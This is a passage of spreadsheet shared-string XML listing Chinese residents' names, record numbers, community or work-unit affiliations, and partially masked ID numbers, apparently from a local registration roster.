  <si>
    <t>张建凤</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>彭建华</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>王东升</t>
  </si>
  <si>
    <t>1002</t>
  </si>
  <si>
    <t>张新恒</t>
  </si>
  <si>
    <t>412921********441X</t>
  </si>
  <si>
    <t>1003</t>
  </si>
  <si>
    <t>张茗豪</t>
  </si>
  <si>
    <t>411321********0710</t>
  </si>
  <si>
    <t>1004</t>
  </si>
  <si>
    <t>民主社区粮食局</t>
  </si>
  <si>
    <t>张春克</t>
  </si>
  <si>
    <t>412921********5877</t>
  </si>
  <si>
    <t>1005</t>
  </si>
  <si>
    <t>民主社区外贸局</t>
  </si>
  <si>
    <t>马建超</t>
  </si>
  <si>
    <t>1006</t>
  </si>
  <si>
    <t>吴海静</t>
  </si>
  <si>
    <t>412921********4501</t>
  </si>
  <si>
    <t>1007</t>
  </si>
  <si>
    <t>1008</t>
  </si>
  <si>
    <t>万玉帮</t>
  </si>
  <si>
    <t>1009</t>
  </si>
  <si>
    <t>民主社区县社</t>
  </si>
  <si>
    <t>郭淼</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
    <t>谷奇恩</t>
  </si>
  <si>
    <t>1011</t>
  </si>
  <si>
    <t>潘雲</t>
  </si>
  <si>
    <t>1012</t>
  </si>
  <si>
    <t>蔡磊</t>
  </si>
  <si>
    <t>1013</t>
  </si>
  <si>
    <t>崔金敏</t>
  </si>
  <si>
    <t>1014</t>
  </si>
  <si>
    <t>杜明强</t>
  </si>
  <si>
    <t>412921********3697</t>
  </si>
  <si>
    <t>1015</t>
  </si>
  <si>
    <t>李玉国</t>
  </si>
  <si>
    <t>1016</t>
  </si>
  <si>
    <t>周河歧</t>
  </si>
  <si>
    <t>1017</t>
  </si>
  <si>
    <t>张庆雨</t>
  </si>
  <si>
    <t>412921********3611</t>
  </si>
  <si>
    <t>1018</t>
  </si>
  <si>
    <t>北外社区教育局</t>
  </si>
  <si>
    <t>杨洪昌</t>
  </si>
  <si>
    <t>412921********3614</t>
  </si>
  <si>
    <t>1019</t>
  </si>
  <si>
    <t>北外社区工信局</t>
  </si>
  <si>
    <t>林太明</t>
  </si>
  <si>
    <t>1020</t>
  </si>
  <si>
    <t>张荣珍</t>
  </si>
  <si>
    <t>412921********5823</t>
  </si>
  <si>
    <t>1021</t>
  </si>
  <si>
    <t>北外社区粮食局</t>
  </si>
  <si>
    <t>王山平</t>
  </si>
  <si>
    <t>1022</t>
  </si>
  <si>
    <t>北外社区县社</t>
  </si>
  <si>
    <t>孙书超</t>
  </si>
  <si>
    <t>1023</t>
  </si>
  <si>
    <t>412921********481X</t>
  </si>
  <si>
    <t>1024</t>
  </si>
  <si>
    <t>王晓峰</t>
  </si>
  <si>
    <t>1025</t>
  </si>
  <si>
    <t>张殿基</t>
  </si>
  <si>
    <t>1026</t>
  </si>
  <si>
    <t>李贵霞</t>
  </si>
  <si>
    <t>412921********0428</t>
  </si>
  <si>
    <t>1027</t>
  </si>
  <si>
    <t>翟广奇</t>
  </si>
  <si>
    <t>1028</t>
  </si>
  <si>
    <t>刘贵兰</t>
  </si>
  <si>
    <t>1029</t>
  </si>
  <si>
    <t>刘明山</t>
  </si>
  <si>
    <t>411326********0097</t>
  </si>
  <si>
    <t>1030</t>
  </si>
  <si>
    <t>黄廷娟</t>
  </si>
  <si>
    <t>412921********0184</t>
  </si>
  <si>
    <t>1031</t>
  </si>
  <si>
    <t>黄廷超</t>
  </si>
  <si>
    <t>412921********0211</t>
  </si>
  <si>
    <t>1032</t>
  </si>
  <si>
    <t>尹海军</t>
  </si>
  <si>
    <t>1033</t>
  </si>
  <si>
    <t>尹昭杨</t>
  </si>
  <si>
    <t>411321********0057</t>
  </si>
  <si>
    <t>1034</t>
  </si>
  <si>
    <t>张振</t>
  </si>
  <si>
    <t>1035</t>
  </si>
  <si>
    <t>张傲</t>
  </si>
  <si>
    <t>1036</t>
  </si>
  <si>
    <t>郑慎贵</t>
  </si>
  <si>
    <t>1037</t>
  </si>
  <si>
    <t>王立有</t>
  </si>
  <si>
    <t>1038</t>
  </si>
  <si>
    <t>王天春</t>
  </si>
  <si>
    <t>1039</t>
  </si>
  <si>
    <t>王中奕</t>
  </si>
  <si>
    <t>411321********5191</t>
  </si>
  <si>
    <t>1040</t>
  </si>
  <si>
    <t>王天秀</t>
  </si>
  <si>
    <t>1041</t>
  </si>
  <si>
    <t>王俊霞</t>
  </si>
  <si>
    <t>1042</t>
  </si>
  <si>
    <t>王环波</t>
  </si>
  <si>
    <t>1043</t>
  </si>
  <si>
    <t>王环宁</t>
  </si>
  <si>
    <t>411321********0213</t>
  </si>
  <si>
    <t>1044</t>
  </si>
  <si>
    <t>马先英</t>
  </si>
  <si>
    <t>1045</t>
  </si>
  <si>
    <t>李玉振</t>
  </si>
  <si>
    <t>1046</t>
  </si>
  <si>
    <t>蔡平</t>
  </si>
  <si>
    <t>1047</t>
  </si>
  <si>
    <t>黄金桂</t>
  </si>
  <si>
    <t>1048</t>
  </si>
  <si>
    <t>广电局中华办理</t>
  </si>
  <si>
    <t>查光丽</t>
  </si>
  <si>
    <t>412921********4025</t>
  </si>
  <si>
    <t>1049</t>
  </si>
  <si>
    <t>粮食局中华社区办理</t>
  </si>
  <si>
    <t>牛清波</t>
  </si>
  <si>
    <t>1050</t>
  </si>
  <si>
    <t>民政局中华社区办理</t>
  </si>
  <si>
    <t>杨清源</t>
  </si>
  <si>
    <t>411321********1537</t>
  </si>
  <si>
    <t>1051</t>
  </si>
  <si>
    <t>双鹏有限公司中华社区办理</t>
  </si>
  <si>
    <t>刘宏中</t>
  </si>
  <si>
    <t>1052</t>
  </si>
  <si>
    <t>税务局中华办理</t>
  </si>
  <si>
    <t>王云</t>
  </si>
  <si>
    <t>1053</t>
  </si>
  <si>
    <t>古中先</t>
  </si>
  <si>
    <t>1054</t>
  </si>
  <si>
    <t>古中伟</t>
  </si>
  <si>
    <t>1055</t>
  </si>
  <si>
    <t>地税所中华社区</t>
  </si>
  <si>
    <t>王新雨</t>
  </si>
  <si>
    <t>1056</t>
  </si>
  <si>
    <t>商业中心中华社区</t>
  </si>
  <si>
    <t>张保剑</t>
  </si>
  <si>
    <t>412921********0412</t>
  </si>
  <si>
    <t>1057</t>
  </si>
  <si>
    <t>农机局中华社区办理</t>
  </si>
  <si>
    <t>和青丽</t>
  </si>
  <si>
    <t>1058</t>
  </si>
  <si>
    <t>工商局中华社区办理</t>
  </si>
  <si>
    <t>杨丰</t>
  </si>
  <si>
    <t>1059</t>
  </si>
  <si>
    <t>饮食服务公司（中华办理）</t>
  </si>
  <si>
    <t>左书林</t>
  </si>
  <si>
    <t>1060</t>
  </si>
  <si>
    <t>印刷厂西北社区办理</t>
  </si>
  <si>
    <t>杨雪野</t>
  </si>
  <si>
    <t>1061</t>
  </si>
  <si>
    <t>供销社西北社区办理</t>
  </si>
  <si>
    <t>许世彤</t>
  </si>
  <si>
    <t>1062</t>
  </si>
  <si>
    <t>黄华</t>
  </si>
  <si>
    <t>1063</t>
  </si>
  <si>
    <t>商贸公司西北办理</t>
  </si>
  <si>
    <t>王家续</t>
  </si>
  <si>
    <t>1064</t>
  </si>
  <si>
    <t>新兴实业有限公司西北办理</t>
  </si>
  <si>
    <t>李强</t>
  </si>
  <si>
    <t>412921********3616</t>
  </si>
  <si>
    <t>1065</t>
  </si>
  <si>
    <t>物华交电公司中华办理</t>
  </si>
  <si>
    <t>卢长坤</t>
  </si>
  <si>
    <t>1066</t>
  </si>
  <si>
    <t>工信局中华办理</t>
  </si>
  <si>
    <t>朱捍洋</t>
  </si>
  <si>
    <t>412921********0113</t>
  </si>
  <si>
    <t>1067</t>
  </si>
  <si>
    <t>外贸局中华办理</t>
  </si>
  <si>
    <t>赵乾</t>
  </si>
  <si>
    <t>1068</t>
  </si>
  <si>
    <t>赵汉钦</t>
  </si>
  <si>
    <t>1069</t>
  </si>
  <si>
    <t>粮食局中华办理</t>
  </si>
  <si>
    <t>陈亮</t>
  </si>
  <si>
    <t>1070</t>
  </si>
  <si>
    <t>农机局中华办理</t>
  </si>
  <si>
    <t>闫永华</t>
  </si>
  <si>
    <t>1071</t>
  </si>
  <si>
    <t>运输公司民主办理</t>
  </si>
  <si>
    <t>张彦彬</t>
  </si>
  <si>
    <t>411321********0016</t>
  </si>
  <si>
    <t>1072</t>
  </si>
  <si>
    <t>缫丝厂中华办理</t>
  </si>
  <si>
    <t>张玉众</t>
  </si>
  <si>
    <t>411326********0018</t>
  </si>
  <si>
    <t>1073</t>
  </si>
  <si>
    <t>财险公司东北办理</t>
  </si>
  <si>
    <t>陈金玲</t>
  </si>
  <si>
    <t>1074</t>
  </si>
  <si>
    <t>二建南外办理</t>
  </si>
  <si>
    <t>刘杰炘</t>
  </si>
  <si>
    <t>411321********2434</t>
  </si>
  <si>
    <t>1075</t>
  </si>
  <si>
    <t>任付勤</t>
  </si>
  <si>
    <t>1076</t>
  </si>
  <si>
    <t>刘清峰</t>
  </si>
  <si>
    <t>1077</t>
  </si>
  <si>
    <t>张振全</t>
  </si>
  <si>
    <t>1078</t>
  </si>
  <si>
    <t>张华勤</t>
  </si>
  <si>
    <t>1079</t>
  </si>
  <si>
    <t>医药局西北办理</t>
  </si>
  <si>
    <t>赵现伟</t>
  </si>
  <si>
    <t>412921********4436</t>
  </si>
  <si>
    <t>1080</t>
  </si>
  <si>
    <t>陈清</t>
  </si>
  <si>
    <t>412921********4529</t>
  </si>
  <si>
    <t>1081</t>
  </si>
  <si>
    <t>冯朝忠</t>
  </si>
  <si>
    <t>412921********2412</t>
  </si>
  <si>
    <t>1082</t>
  </si>
  <si>
    <t>冯中良</t>
  </si>
  <si>
    <t>1083</t>
  </si>
  <si>
    <t>商业局西北办理</t>
  </si>
  <si>
    <t>武晓东</t>
  </si>
  <si>
    <t>1084</t>
  </si>
  <si>
    <t>物资局中华办理</t>
  </si>
  <si>
    <t>董秋生</t>
  </si>
  <si>
    <t>1085</t>
  </si>
  <si>
    <t>侯正阳</t>
  </si>
  <si>
    <t>1086</t>
  </si>
  <si>
    <t>农业局民主办理</t>
  </si>
  <si>
    <t>李假</t>
  </si>
  <si>
    <t>1087</t>
  </si>
  <si>
    <t>范永清</t>
  </si>
  <si>
    <t>1088</t>
  </si>
  <si>
    <t>刘中兰</t>
  </si>
  <si>
    <t>1089</t>
  </si>
  <si>
    <t>农业局（民主社区办理）</t>
  </si>
  <si>
    <t>周丰一</t>
  </si>
  <si>
    <t>1090</t>
  </si>
  <si>
    <t>郝钰淇</t>
  </si>
  <si>
    <t>1091</t>
  </si>
  <si>
    <t>二建（民主社区办理）</t>
  </si>
  <si>
    <t>程远秀</t>
  </si>
  <si>
    <t>1092</t>
  </si>
  <si>
    <t>二建（南外社区办理）</t>
  </si>
  <si>
    <t>412921********2837</t>
  </si>
  <si>
    <t>1093</t>
  </si>
  <si>
    <t>方利霞</t>
  </si>
  <si>
    <t>1094</t>
  </si>
  <si>
    <t>贺天属</t>
  </si>
  <si>
    <t>411326********0057</t>
  </si>
  <si>
    <t>1095</t>
  </si>
  <si>
    <t>物资局（中华办理）</t>
  </si>
  <si>
    <t>赵会平</t>
  </si>
  <si>
    <t>412921********3344</t>
  </si>
  <si>
    <t>1096</t>
  </si>
  <si>
    <t>西北二组</t>
  </si>
  <si>
    <t>孙月</t>
  </si>
  <si>
    <t>1097</t>
  </si>
  <si>
    <t>砖瓦厂北外办理</t>
  </si>
  <si>
    <t>王付太</t>
  </si>
  <si>
    <t>412921********1552</t>
  </si>
  <si>
    <t>1098</t>
  </si>
  <si>
    <t>赵锋远</t>
  </si>
  <si>
    <t>1099</t>
  </si>
  <si>
    <t>庆晓丽</t>
  </si>
  <si>
    <t>1100</t>
  </si>
  <si>
    <t>郭曾懋</t>
  </si>
  <si>
    <t>411326********0019</t>
  </si>
  <si>
    <t>1101</t>
  </si>
  <si>
    <t>饮食服务公司中华办理</t>
  </si>
  <si>
    <t>李梓豪</t>
  </si>
  <si>
    <t>411321********5330</t>
  </si>
  <si>
    <t>1102</t>
  </si>
  <si>
    <t>李梓瑜</t>
  </si>
  <si>
    <t>1103</t>
  </si>
  <si>
    <t>蚕业局中华办理</t>
  </si>
  <si>
    <t>陈玉修</t>
  </si>
  <si>
    <t>1104</t>
  </si>
  <si>
    <t>王佳妮</t>
  </si>
  <si>
    <t>1105</t>
  </si>
  <si>
    <t>剧团西北办理</t>
  </si>
  <si>
    <t>田宏兴</t>
  </si>
  <si>
    <t>1106</t>
  </si>
  <si>
    <t>田红瑞</t>
  </si>
  <si>
    <t>412921********552X</t>
  </si>
  <si>
    <t>1107</t>
  </si>
  <si>
    <t>朱秀勤</t>
  </si>
  <si>
    <t>1108</t>
  </si>
  <si>
    <t>丁峰</t>
  </si>
  <si>
    <t>1109</t>
  </si>
  <si>
    <t>丁照航</t>
  </si>
  <si>
    <t>1110</t>
  </si>
  <si>
    <t>杨立英</t>
  </si>
  <si>
    <t>1111</t>
  </si>
  <si>
    <t>林业局（北外办理）</t>
  </si>
  <si>
    <t>王昌昊</t>
  </si>
  <si>
    <t>411321********6117</t>
  </si>
  <si>
    <t>1112</t>
  </si>
  <si>
    <t>巢丝厂（民主办理）</t>
  </si>
  <si>
    <t>王军</t>
  </si>
  <si>
    <t>1113</t>
  </si>
  <si>
    <t>法院（民主社区办理）</t>
  </si>
  <si>
    <t>田周文</t>
  </si>
  <si>
    <t>411321********0318</t>
  </si>
  <si>
    <t>1114</t>
  </si>
  <si>
    <t>田周武</t>
  </si>
  <si>
    <t>411321********0334</t>
  </si>
  <si>
    <t>1115</t>
  </si>
  <si>
    <t>榆木厂（民主办理）</t>
  </si>
  <si>
    <t>李振晓</t>
  </si>
  <si>
    <t>1116</t>
  </si>
  <si>
    <t>朱艳</t>
  </si>
  <si>
    <t>412921********5541</t>
  </si>
  <si>
    <t>1117</t>
  </si>
  <si>
    <t>席云凯</t>
  </si>
  <si>
    <t>1118</t>
  </si>
  <si>
    <t>岳朝昱</t>
  </si>
  <si>
    <t>1119</t>
  </si>
  <si>
    <t>赵俊峰</t>
  </si>
  <si>
    <t>412921********5825</t>
  </si>
  <si>
    <t>1120</t>
  </si>
  <si>
    <t>饮食服务公司（ 中华办理）</t>
  </si>
  <si>
    <t>张青</t>
  </si>
  <si>
    <t>411326********0049</t>
  </si>
  <si>
    <t>1121</t>
  </si>
  <si>
    <t>蚕业局（中华办理）</t>
  </si>
  <si>
    <t>刘玉忠</t>
  </si>
  <si>
    <t>1122</t>
  </si>
  <si>
    <t>向瑞刚</t>
  </si>
  <si>
    <t>1123</t>
  </si>
  <si>
    <t>党龙咸</t>
  </si>
  <si>
    <t>1124</t>
  </si>
  <si>
    <t>王淑敏</t>
  </si>
  <si>
    <t>1125</t>
  </si>
  <si>
    <t>李雨欣</t>
  </si>
  <si>
    <t>411322********1348</t>
  </si>
  <si>
    <t>1126</t>
  </si>
  <si>
    <t>水利局（中华办理）</t>
  </si>
  <si>
    <t>李崇高</t>
  </si>
  <si>
    <t>411321********2815</t>
  </si>
  <si>
    <t>1127</t>
  </si>
  <si>
    <t>杨景玲</t>
  </si>
  <si>
    <t>412921********3361</t>
  </si>
  <si>
    <t>1128</t>
  </si>
  <si>
    <t>房管局（中华办理）</t>
  </si>
  <si>
    <t>焦心霞</t>
  </si>
  <si>
    <t>1129</t>
  </si>
  <si>
    <t>电线厂（中华办理）</t>
  </si>
  <si>
    <t>王小京</t>
  </si>
  <si>
    <t>1130</t>
  </si>
  <si>
    <t>外贸局（中华办理）</t>
  </si>
  <si>
    <t>陈莉</t>
  </si>
  <si>
    <t>1131</t>
  </si>
  <si>
    <t>木器厂（中华办理）</t>
  </si>
  <si>
    <t>陈建德</t>
  </si>
  <si>
    <t>1132</t>
  </si>
  <si>
    <t>李士伟</t>
  </si>
  <si>
    <t>1133</t>
  </si>
  <si>
    <t>张宗龙</t>
  </si>
  <si>
    <t>1134</t>
  </si>
  <si>
    <t>张玉</t>
  </si>
  <si>
    <t>411326********042X</t>
  </si>
  <si>
    <t>1135</t>
  </si>
  <si>
    <t>刘龙圃</t>
  </si>
  <si>
    <t>412921********3629</t>
  </si>
  <si>
    <t>1136</t>
  </si>
  <si>
    <t>张平</t>
  </si>
  <si>
    <t>412921********0427</t>
  </si>
  <si>
    <t>1137</t>
  </si>
  <si>
    <t>周庆焕</t>
  </si>
  <si>
    <t>1138</t>
  </si>
  <si>
    <t>蔺玉华</t>
  </si>
  <si>
    <t>1139</t>
  </si>
  <si>
    <t>巢丝厂（中华办理）</t>
  </si>
  <si>
    <t>姚玉伟</t>
  </si>
  <si>
    <t>412921********5252</t>
  </si>
  <si>
    <t>1140</t>
  </si>
  <si>
    <t>水文站（南外办理）</t>
  </si>
  <si>
    <t>段国祥</t>
  </si>
  <si>
    <t>412921********2812</t>
  </si>
  <si>
    <t>1141</t>
  </si>
  <si>
    <t>木材公司（中华办理）</t>
  </si>
  <si>
    <t>周万吉</t>
  </si>
  <si>
    <t>412921********3618</t>
  </si>
  <si>
    <t>1142</t>
  </si>
  <si>
    <t>新华书店（西北办理）</t>
  </si>
  <si>
    <t>412921********3638</t>
  </si>
  <si>
    <t>1143</t>
  </si>
  <si>
    <t>黄瑞芳</t>
  </si>
  <si>
    <t>1144</t>
  </si>
  <si>
    <t>李翘楚</t>
  </si>
  <si>
    <t>411326********1523</t>
  </si>
  <si>
    <t>1145</t>
  </si>
  <si>
    <t>张海顺</t>
  </si>
  <si>
    <t>1146</t>
  </si>
  <si>
    <t>民政局（中华社区）</t>
  </si>
  <si>
    <t>杨立兰</t>
  </si>
  <si>
    <t>1147</t>
  </si>
  <si>
    <t>张家立</t>
  </si>
  <si>
    <t>1148</t>
  </si>
  <si>
    <t>黄金局（东北社区）</t>
  </si>
  <si>
    <t>毛庆秋</t>
  </si>
  <si>
    <t>1149</t>
  </si>
  <si>
    <t>褚清玉</t>
  </si>
  <si>
    <t>1150</t>
  </si>
  <si>
    <t>范梓霖</t>
  </si>
  <si>
    <t>411326********0028</t>
  </si>
  <si>
    <t>1151</t>
  </si>
  <si>
    <t>刘发勤</t>
  </si>
  <si>
    <t>1152</t>
  </si>
  <si>
    <t>潘伟</t>
  </si>
  <si>
    <t>1153</t>
  </si>
  <si>
    <t>孙若童</t>
  </si>
  <si>
    <t>411321********622X</t>
  </si>
  <si>
    <t>1154</t>
  </si>
  <si>
    <t>朱振全</t>
  </si>
  <si>
    <t>1155</t>
  </si>
  <si>
    <t>砖瓦厂（北外办理）</t>
  </si>
  <si>
    <t>张富权</t>
  </si>
  <si>
    <t>411321********0512</t>
  </si>
  <si>
    <t>1156</t>
  </si>
  <si>
    <t>曾志群</t>
  </si>
  <si>
    <t>412921********0546</t>
  </si>
  <si>
    <t>1157</t>
  </si>
  <si>
    <t>张奇云</t>
  </si>
  <si>
    <t>1158</t>
  </si>
  <si>
    <t>李忠</t>
  </si>
  <si>
    <t>1159</t>
  </si>
  <si>
    <t>商务局（中华办理）</t>
  </si>
  <si>
    <t>仝岩</t>
  </si>
  <si>
    <t>412921********151X</t>
  </si>
  <si>
    <t>1160</t>
  </si>
  <si>
    <t>仝闻铎</t>
  </si>
  <si>
    <t>1161</t>
  </si>
  <si>
    <t>郭延申</t>
  </si>
  <si>
    <t>1162</t>
  </si>
  <si>
    <t>方彬彬</t>
  </si>
  <si>
    <t>1163</t>
  </si>
  <si>
    <t>司法局（中华办理）</t>
  </si>
  <si>
    <t>郝依依</t>
  </si>
  <si>
    <t>411321********556X</t>
  </si>
  <si>
    <t>1164</t>
  </si>
  <si>
    <t>席文德</t>
  </si>
  <si>
    <t>1165</t>
  </si>
  <si>
    <t>吴鹏</t>
  </si>
  <si>
    <t>1166</t>
  </si>
  <si>
    <t>民主社区</t>
  </si>
  <si>
    <t>王文晨</t>
  </si>
  <si>
    <t>411326********0051</t>
  </si>
  <si>
    <t>1167</t>
  </si>
  <si>
    <t>吴志山</t>
  </si>
  <si>
    <t>412921********0111</t>
  </si>
  <si>
    <t>1168</t>
  </si>
  <si>
    <t>张新</t>
  </si>
  <si>
    <t>1169</t>
  </si>
  <si>
    <t>樊锋</t>
  </si>
  <si>
    <t>411326********0035</t>
  </si>
  <si>
    <t>1170</t>
  </si>
  <si>
    <t>樊思彤</t>
  </si>
  <si>
    <t>411321********0040</t>
  </si>
  <si>
    <t>1171</t>
  </si>
  <si>
    <t>王旺</t>
  </si>
  <si>
    <t>1172</t>
  </si>
  <si>
    <t>机械厂（中华办理）</t>
  </si>
  <si>
    <t>黄荣范</t>
  </si>
  <si>
    <t>1173</t>
  </si>
  <si>
    <t>刘小梅</t>
  </si>
  <si>
    <t>1174</t>
  </si>
  <si>
    <t>郭洪霞</t>
  </si>
  <si>
    <t>1175</t>
  </si>
  <si>
    <t>刘国清</t>
  </si>
  <si>
    <t>1176</t>
  </si>
  <si>
    <t>张聚风</t>
  </si>
  <si>
    <t>1177</t>
  </si>
  <si>
    <t>吴桂荣</t>
  </si>
  <si>
    <t>1178</t>
  </si>
  <si>
    <t>二建（中华办理）</t>
  </si>
  <si>
    <t>聂建伟</t>
  </si>
  <si>
    <t>1179</t>
  </si>
  <si>
    <t>缫丝厂（中华办理）</t>
  </si>
  <si>
    <t>曹媛</t>
  </si>
  <si>
    <t>1180</t>
  </si>
  <si>
    <t>高志国</t>
  </si>
  <si>
    <t>412921********3619</t>
  </si>
  <si>
    <t>1181</t>
  </si>
  <si>
    <t>李明会</t>
  </si>
  <si>
    <t>1182</t>
  </si>
  <si>
    <t>孙建叶</t>
  </si>
  <si>
    <t>1183</t>
  </si>
  <si>
    <t>张珂</t>
  </si>
  <si>
    <t>1184</t>
  </si>
  <si>
    <t>王伟</t>
  </si>
  <si>
    <t>1185</t>
  </si>
  <si>
    <t>粮局（中华办理）</t>
  </si>
  <si>
    <t>蔡长兰</t>
  </si>
  <si>
    <t>412921********0420</t>
  </si>
  <si>
    <t>1186</t>
  </si>
  <si>
    <t>中华四组</t>
  </si>
  <si>
    <t>崔建东</t>
  </si>
  <si>
    <t>1187</t>
  </si>
  <si>
    <t>陈舒</t>
  </si>
  <si>
    <t>1188</t>
  </si>
  <si>
    <t>谷秀宽</t>
  </si>
  <si>
    <t>1189</t>
  </si>
  <si>
    <t>杜平</t>
  </si>
  <si>
    <t>1190</t>
  </si>
  <si>
    <t>配件厂（中华社区）</t>
  </si>
  <si>
    <t>曾泓晔</t>
  </si>
  <si>
    <t>411321********0293</t>
  </si>
  <si>
    <t>2025年4月</t>
  </si>
  <si>
    <t>1191</t>
  </si>
  <si>
    <t>曹振甫</t>
  </si>
  <si>
    <t>412921********3333</t>
  </si>
  <si>
    <t>1192</t>
  </si>
  <si>
    <t>李小锋</t>
  </si>
  <si>
    <t>412322********4822</t>
  </si>
  <si>
    <t>1193</t>
  </si>
  <si>
    <t>董可鑫</t>
  </si>
  <si>
    <t>411321********0127</t>
  </si>
  <si>
    <t>2025年5月</t>
  </si>
  <si>
    <t>1194</t>
  </si>
  <si>
    <t>董若琳</t>
  </si>
  <si>
    <t>411321********0340</t>
  </si>
  <si>
    <t>1195</t>
  </si>
  <si>
    <t>中华</t>
  </si>
  <si>
    <t>王付珍</t>
  </si>
  <si>
    <t>1196</t>
  </si>
  <si>
    <t>许秀芝</t>
  </si>
  <si>
    <t>1197</t>
  </si>
  <si>
    <t>刘会焕</t>
  </si>
  <si>
    <t>412921********0108</t>
  </si>
  <si>
    <t>1198</t>
  </si>
  <si>
    <t>崔峥嵘</t>
  </si>
  <si>
    <t>1199</t>
  </si>
  <si>
    <t>孙国歧</t>
  </si>
  <si>
    <t>412921********403X</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>城郊乡</t>
  </si>
  <si>
    <t>宋万荣</t>
  </si>
  <si>
    <t>412921********0419</t>
  </si>
  <si>
    <t>4113210299</t>
  </si>
  <si>
    <t>1201</t>
  </si>
  <si>
    <t>李俊兰</t>
  </si>
  <si>
    <t>1202</t>
  </si>
  <si>
    <t>任秀婷</t>
  </si>
  <si>
    <t>412921********4465</t>
  </si>
  <si>
    <t>1203</t>
  </si>
  <si>
    <t>任成法</t>
  </si>
  <si>
    <t>412921********4454</t>
  </si>
  <si>
    <t>1204</t>
  </si>
  <si>
    <t>胡俊相</t>
  </si>
  <si>
    <t>412921********0411</t>
  </si>
  <si>
    <t>1205</t>
  </si>
  <si>
    <t>胡国森</t>
  </si>
  <si>
    <t>411321********0056</t>
  </si>
  <si>
    <t>1206</t>
  </si>
  <si>
    <t>靳小虎</t>
  </si>
  <si>
    <t>412921********0432</t>
  </si>
  <si>
    <t>1207</t>
  </si>
  <si>
    <t>靳小青</t>
  </si>
  <si>
    <t>412921********0423</t>
  </si>
  <si>
    <t>1208</t>
  </si>
  <si>
    <t>段洪如</t>
  </si>
  <si>
    <t>1209</t>
  </si>
  <si>
    <t>任来华</t>
  </si>
  <si>
    <t>412921********5124</t>
  </si>
  <si>
    <t>1210</t>
  </si>
  <si>
    <t>张自修</t>
  </si>
  <si>
    <t>412921********6034</t>
  </si>
  <si>
    <t>1211</t>
  </si>
  <si>
    <t>1212</t>
  </si>
  <si>
    <t>任秀华</t>
  </si>
  <si>
    <t>412921********0448</t>
  </si>
  <si>
    <t>1213</t>
  </si>
  <si>
    <t>刘元正</t>
  </si>
  <si>
    <t>412921********061X</t>
  </si>
  <si>
    <t>1214</t>
  </si>
  <si>
    <t>冯居萍</t>
  </si>
  <si>
    <t>1215</t>
  </si>
  <si>
    <t>董亚涵</t>
  </si>
  <si>
    <t>411321********3628</t>
  </si>
  <si>
    <t>1216</t>
  </si>
  <si>
    <t>吴国敏</t>
  </si>
  <si>
    <t>1217</t>
  </si>
  <si>
    <t>韩国欣</t>
  </si>
  <si>
    <t>412921********0434</t>
  </si>
  <si>
    <t>1218</t>
  </si>
  <si>
    <t>段召运</t>
  </si>
  <si>
    <t>1219</t>
  </si>
  <si>
    <t>岳良</t>
  </si>
  <si>
    <t>412921********0453</t>
  </si>
  <si>
    <t>1220</t>
  </si>
  <si>
    <t>岳凡杰</t>
  </si>
  <si>
    <t>411326********0419</t>
  </si>
  <si>
    <t>1221</t>
  </si>
  <si>
    <t>杨玉珍</t>
  </si>
  <si>
    <t>412921********0441</t>
  </si>
  <si>
    <t>1222</t>
  </si>
  <si>
    <t>周敏</t>
  </si>
  <si>
    <t>1223</t>
  </si>
  <si>
    <t>宋学礼</t>
  </si>
  <si>
    <t>412921********0414</t>
  </si>
  <si>
    <t>1224</t>
  </si>
  <si>
    <t>杨之丽</t>
  </si>
  <si>
    <t>1225</t>
  </si>
  <si>
    <t>杨双琳</t>
  </si>
  <si>
    <t>411321********0412</t>
  </si>
  <si>
    <t>1226</t>
  </si>
  <si>
    <t>庙坡村</t>
  </si>
  <si>
    <t>张新芳</t>
  </si>
  <si>
    <t>4113210215</t>
  </si>
  <si>
    <t>1227</t>
  </si>
  <si>
    <t>城郊校委会</t>
  </si>
  <si>
    <t>尚兴龙</t>
  </si>
  <si>
    <t>412921********1117</t>
  </si>
  <si>
    <t>1228</t>
  </si>
  <si>
    <t>王娜</t>
  </si>
  <si>
    <t>412921********0443</t>
  </si>
  <si>
    <t>1229</t>
  </si>
  <si>
    <t>宋楼村</t>
  </si>
  <si>
    <t>闫好文</t>
  </si>
  <si>
    <t>1230</t>
  </si>
  <si>
    <t>前庄村</t>
  </si>
  <si>
    <t>栗荣根</t>
  </si>
  <si>
    <t>1231</t>
  </si>
  <si>
    <t>尹语欣</t>
  </si>
  <si>
    <t>411321********0467</t>
  </si>
  <si>
    <t>1232</t>
  </si>
  <si>
    <t>尹学桦</t>
  </si>
  <si>
    <t>411321********0407</t>
  </si>
  <si>
    <t>1233</t>
  </si>
  <si>
    <t>尹学森</t>
  </si>
  <si>
    <t>411321********0215</t>
  </si>
  <si>
    <t>1234</t>
  </si>
  <si>
    <t>闫沟村</t>
  </si>
  <si>
    <t>屈向军</t>
  </si>
  <si>
    <t>412921********0417</t>
  </si>
  <si>
    <t>1235</t>
  </si>
  <si>
    <t>城郊供销社</t>
  </si>
  <si>
    <t>1236</t>
  </si>
  <si>
    <t>彭中盈</t>
  </si>
  <si>
    <t>412921********0425</t>
  </si>
  <si>
    <t>1237</t>
  </si>
  <si>
    <t>留山镇</t>
  </si>
  <si>
    <t>刘喜中</t>
  </si>
  <si>
    <t>412921********0731</t>
  </si>
  <si>
    <t>1238</t>
  </si>
  <si>
    <t>刘得荣</t>
  </si>
  <si>
    <t>412921********0726</t>
  </si>
  <si>
    <t>1239</t>
  </si>
  <si>
    <t>唐花林</t>
  </si>
  <si>
    <t>412921********0725</t>
  </si>
  <si>
    <t>1240</t>
  </si>
  <si>
    <t>王奎</t>
  </si>
  <si>
    <t>412921********0735</t>
  </si>
  <si>
    <t>1241</t>
  </si>
  <si>
    <t>刘长荣</t>
  </si>
  <si>
    <t>412921********0723</t>
  </si>
  <si>
    <t>1242</t>
  </si>
  <si>
    <t>赵玉焕</t>
  </si>
  <si>
    <t>412921********0721</t>
  </si>
  <si>
    <t>1243</t>
  </si>
  <si>
    <t>班凤香</t>
  </si>
  <si>
    <t>412921********0722</t>
  </si>
  <si>
    <t>1244</t>
  </si>
  <si>
    <t>唐青林</t>
  </si>
  <si>
    <t>412921********0713</t>
  </si>
  <si>
    <t>1245</t>
  </si>
  <si>
    <t>任德珍</t>
  </si>
  <si>
    <t>1246</t>
  </si>
  <si>
    <t>王朝玲</t>
  </si>
  <si>
    <t>412921********2488</t>
  </si>
  <si>
    <t>1247</t>
  </si>
  <si>
    <t>焦成梅</t>
  </si>
  <si>
    <t>1248</t>
  </si>
  <si>
